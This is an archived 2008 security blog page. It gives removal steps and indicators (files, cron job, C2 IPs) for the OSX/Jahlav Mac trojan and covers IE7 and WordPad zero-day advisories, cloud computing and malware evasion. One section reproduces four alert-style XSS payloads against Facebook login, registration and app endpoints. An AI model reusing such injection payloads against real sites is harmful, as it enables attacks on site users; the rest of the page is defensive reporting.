Archive

Archive for December, 2008

How To Remove “MacAccess” Trojan

Due to infection reports and prevalence of this threat, here’s a removal instruction for “MacAccess” trojan.

The presence of the following files indicates that the infection or installation of this tricky trojan went successfully.

installed_files

/cron.inst
/i386
/Library/Internet Plug-Ins/AdobeFlash
/Library/Internet Plug-Ins/Mozillaplug.plugin

Please take note that the files /cron.inst and /i386 may not exists since it usually gets deleted after the trojan successfully executed its code.

To fix the infection, simply delete any of these files.

Also,  this trojan creates a cron (or scheduling) job (/cron.inst) that executes a malicious Perl script named “AdobeFlash” found in “/Library/Internet Plugins/” and this  is important that you check this part through terminal.  Execute “sudo crontab -l” to list or display the scheduled job as exampled below:

***Thanks for all the feedback!; To all reader use sudo to allow a normal user to run crontab commands as root***

The cron job executes every five minutes, which triggers the backdoor to check the remote IP address. It has been observed to check for these remote IP addresses:

94.247.2.109
78.157.142.187


To remove, simply execute “sudo crontab -r” and double check by executing “sudo crontab -l” as exampled below:

remove

Take note: You have to open Terminal to run “crontab”. Terminal is located at ~/Applications/Utilities or you can simple search it using Spotlight as shown below:

Terminal

OSX/Jahlav aka “MacAccess” will attempt to connect to  mentioned IP address (this may vary depending on the variant) which may install another trojan often DNSChanger. So, it is best to check your DNS settings and notice if there is some dodgy entries like IP starting with 85.xx.xx.xx. To fix, just simply remove it and restore back your legitimate DNS settings.  Please check this instruction to help you fix malicious DNS entries.

If this instruction works, then i’ll be excited to hear your story.  I’m sure any info will also help other OS X users.

If not,  please feel free to drop a message and hopefully with additional information such as:

  • How did you get infected ? (website? )
  • Do you still have a copy of the application you installed ?  If yes, please send it to this email address:  meths101 (at) optusnet (dot) com (dot) au ; or just send me a link where I can download it.
  • Any unusual behavior found in your computer.

Updated 5/22/2009:

– Added information about Terminal as per request.

Updated 6/10/2009:

– Added link to How To Check Your DNS Settings

MS “Out-of Band” Security Update

This is an advance notification of an out-of-band security bulletin that Microsoft is intending to release on December 17, 2008.

The full version of the Microsoft Security Bulletin Advance Notification for December 2008 can be found at http://www.microsoft.com/technet/security/bulletin/ms08-dec.mspx.

This resolves newly discovered vulnerability such as the critical IE7 flaw.

Critical Facebook XSS

Facebook worm aka “Koobface” exploiting highly critical XSS vulnerability as recently discovered. It seems these guys successfully mess around in facebook as it has been around for months now. 

Further Reading xssed.com

XSS #1 with POST (by Zeitjak

http://www.new.facebook.com/r.php

POST: reg_email__=”onmouseover=”alert(‘XSS – ZJ’)”foo=”bar

XSS #2 with POST (by David Wharton

https://login.facebook.com/login.php?iphone&next=http%3A%2F%2Fiphone.facebook.com%2F

POST: 

email=biz%22%3E%3Cscript%3Ealert%28%27tohellwithgeorgia%27%29%3C%2Fscript%3E%3C%22&pass=greetz2evilghost&next=http%3A%2F%2Fiphone.facebook.com%2F&login=Login

XSS #3 (by DaiMon)

http://apps.facebook.com/blognetworks/searchpage.php?tag=%22%3E%3Cscript%3Ealert(%22DaiMon%22)%3C/script%3E

This one works on another IP (67.228.87.82) and can’t be used for a worm, except a phishing one.

XSS #4 with POST (by p3lo)

http://developers.facebook.com/tools.php?fbml

POST: 

profile=1299125444&position=wide&api_key=%27%22%3E%3C%2Ftitle%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E%3E%3Cmarquee%3E%3Ch1%3EXSS+by+p3lo%3C%2Fh1%3E%3C%2Fmarquee%3E+&fbml=

–>> Hmmm nice PoC to play around.

You and Cloud Computing

Cloud computing is a new currency in information technology.  It is becoming acceptable architecture by which people enjoys accessibility of its application, data and information through a web-connected device. Although there were alot of critics and debatable issues behind this emerging trend, still most of internet users appreciate the benefits of it. 

mobilemeDifferent versions of cloud computing just like Apple MobileMe  which allows you to sync data and access it through different web-connected device like iphone, ipod, mac and pc. 

linkedinAnother example of cloud computing is social networking websites such as LinkedIn who started to embrace and introduced data-sharing applications such as  WordPress, Google Presentation, Blog link and more – this allows users to share and collaborate data with their peers just like me. 

aws

 

Amazon web services (AWS) provides cloud services in a scalable and inexpensive computing platform. 

 

googleappsGoogle Apps  where it provides service that allow users to enjoy Google Calendar, Picasa (stores picture), YouTube (hold videos), Gmail, Google Docs (document, spreadsheets and presentation).

 

skydrive  Windows Live SkyDrive allow users to upload their files to the computing cloud, and then access them from a web browser. [Read Wiki] It is currently in Beta and users could get 25 GB free storage for free! So, Windows Live Photos, Favorite Web Links, Window Live Spaces (blog, photo, list, profile, gadgets, contact card integration with MSN messenger and hotmail) and RSS Feeds.  

 

We are now surrounded with clouds – cloud storage, service, software and application. This emerging architecture is becoming popular and acceptable as PEW research report says…”Cloud computing takes hold as 69% of all internet users have either stored data online or used a web-based software application” [PEW Cloud Computing data memo]

In information security perspective, the CIA model of cloud computing still raises questions on how far could we trust the cloud providers on Confidentiality – preventing unwanted disclosure; Integrity – preventing unwanted modification; and Availability – make sure it is available when needed.  Do you think this is an option for enterprise? 

On the other hand, I’m thinking about threats such as attacks and infection, will this (cloud computing) be able to provide solution on dramatic increase of malware/threats, do you think it can lessen and make it a safer platform for everyone?

IE & WordPad Zero Day In-The-Wild

IE XML Parsing Remote Buffer OverFlow Exploit [Read Shadowserver Diary]

As many of you have seen, there is a new 0-day exploit in the wild affecting Internet Explorer 7 users. This is a new exploit that is being actively exploited and it was not patched yesterday (meaning there is no patch available, yet). Visiting a website with this exploit can result in a full compromise of an affected system. Currently most of the exploits out there will attempt to download a trojan onto the system.

Recommendation: Do NOT use IE until patch.

Reference: ISC Diary ;  SecmaniacBlog

PoC: 7403 ; 7410

oooOOooo

Microsoft Security Advisory (960906): Vulnerability in WordPad Text Converter Could Allow Remote Code Execution 

Recommendation: Do not use WordPad to open files with .doc, .wri, or .rtf extensions that you receive from untrusted sources or receive unexpectedly from trusted sources. This vulnerability could be exploited when using WordPad to open a specially crafted file. We also recommend customers using Windows XP to upgrade to Windows XP Service Pack 3, which is not affected. 

Affected Systems: Microsoft Windows 2000 Service Pack 4; Windows XP Service Pack 2 Windows XP Professional x64 Edition and Windows XP Professional x64 Edition Service Pack 2 ;Windows Server 2003 Service Pack 1 and Windows Server 2003 Service Pack 2 ; Windows Server 2003 with SP1 for Itanium-based Systems and Windows Server 2003 with SP2 for Itanium-based Systems ; Windows Server 2003 x64 Edition and Windows Server 2003 x64 Edition Service Pack 2

Reference: MS Advisory; CVE-2008-4841Secunia Advisories ; Security Focus

PoC: 6560 ; 31399


OSX/Jahlav evading scanners detection

OSX/Jahlav new variant shows a little trick to evade AV (security scanners ) detection.

preinstall3The same trick for the next script …

preinstall_drop3So it stops here since the last decoded script remains the same except on the IP address value.

Unfortunately, this changes affects the container as well which is the DMG file. Overall,  we are not seeing significant change here although it is obvious the author wants to maximize infection.

Apple removes Mac antivirus warning [CNet News]

Interesting to read as published in  ZDNet Australia

Apple has removed an old item from its support site late Tuesday in the US that urged Mac customers to use multiple antivirus utilities and this week said the Mac is safe “out of the box”. 

Are you sure? Just search around the net you’ll find bunch of Mac users got infected with DNSChanger aka “RSPlug”. And today, I received new sample (still for analysis) but Intego already published awareness. [Read Here] It’s funny the author named its malicious script intego as shown in the code as “begin 666 intego”.